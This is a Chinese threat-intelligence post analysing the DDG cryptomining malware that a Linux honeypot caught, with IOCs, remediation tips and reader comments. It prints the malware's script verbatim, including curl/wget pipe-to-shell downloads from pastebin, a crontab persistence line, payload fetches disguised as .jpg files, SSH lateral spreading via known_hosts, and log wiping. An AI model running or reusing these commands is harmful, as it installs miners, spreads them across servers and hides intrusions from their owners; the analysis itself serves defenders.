蜜罐捕获
【蜜罐捕获】Linux 蜜罐系统捕获到DDG挖矿病毒
cmsfree 2019-04-22 18:08:29 664人浏览

Linux蜜罐监测到 Linux下DDG挖矿病毒,该病毒通过SSH弱口令爆破植入病毒,查杀其他挖矿病毒和DDoS木马,执行自己的挖矿程序,达到谋利的目的。

IOC:

  116.85.19.47

域名:

  https://encodable.com

  http://shop.ybk001.com

  https://pastebin.com

MD5:

  DAFF9129837EC02FB3368D2EBB4731B3

Sha256:

  264DFA0C1E258801D81F949532750D5F295482ACAC2829673CDDB66AD0EC54ED

入侵方式

1、通过SSH弱口令爆破

SSH爆破登录.png

2、爆破成功后,通过https://pastebin.com/恶意网站下载病毒脚本

(curl -fsSL https://pastebin.com/raw/ZgaEWBUa||wget -q -O- https://pastebin.com/raw/ZgaEWBUa)|sed -e 's/\r//g'|sh

3、病毒脚本分析如下:

a、每15分钟从https://pastebin.com/raw下载经过base64编码的脚本并执行

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp
echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/KkY6JPLA||wget -q -O- https://pastebin.com/raw/KkY6JPLA)|sh" | crontab -

b、查杀其他可能存在的挖矿以及DDoS木马:

ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "plfsbce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "luyybce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
netstat -anp|grep 119.9.106.27|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 104.130.210.206|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9

c、该病毒通过识别内核版本,下载对应病毒并执行

if [ ! -f "/tmp/.XIMunix" ] || [ ! -f "/proc/$(cat /tmp/.XIMunix)/io" ]; then
    chattr -i kerberods
    rm -rf kerberods
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://encodable.com/uploaddemo/files/x64.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://encodable.com/uploaddemo/files/x64.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://shop.ybk001.com/memberpic/exwhhs201942231402855772.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://shop.ybk001.com/memberpic/exwhhs201942231402855772.jpg -O kerberods) && chmod +x kerberods
    elif [ ${ARCH}x = "i686x" ]; then
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://encodable.com/uploaddemo/files/x32.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://encodable.com/uploaddemo/files/x32.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -O kerberods) && chmod +x kerberods
    else
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://encodable.com/uploaddemo/files/x32.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://encodable.com/uploaddemo/files/x32.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -O kerberods) && chmod +x kerberods
    fi
        $(pwd)/kerberods || /usr/bin/kerberods || /usr/libexec/kerberods || /usr/local/bin/kerberods || kerberods || ./kerberods || /tmp/kerberods
fi

d、读取.ssh目录下known_hosts中的服务器地址,尝试使用密钥登录后横向传播

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/KkY6JPLA||wget -q -O- https://pastebin.com/raw/KkY6JPLA)|sh >/dev/null 2>&1 &' & done
fi

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron

4、中毒后的解决方法

a、rm /tmp 删除病毒体

b、ps auxf | grep -v grep | grep 病毒进程名 | awk '{print $2}'|xargs kill -9 杀死病毒进程

c、vim ~/.ssh/authorized_keys 如果是密钥登陆的话还需要再~/.ssh/authorized_keys(或者自定的路径)中删除不属于自己或者其他使用者的密钥

威胁指标(IOC)
ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 单独价格 全部 < 1/1 >
bigone 2019-04-25 09:54:00 回复
上面那个查杀其他木马的命令是不是可以拿来检测机器是否存在挖矿木马
cmsfree 2019-04-26 11:39:52 回复
回复@bigone: 可以用来识别的
匿名用户 2019-04-23 23:02:59 回复
没看懂
cmsfree 2019-04-26 11:40:01 回复
分析得比较粗糙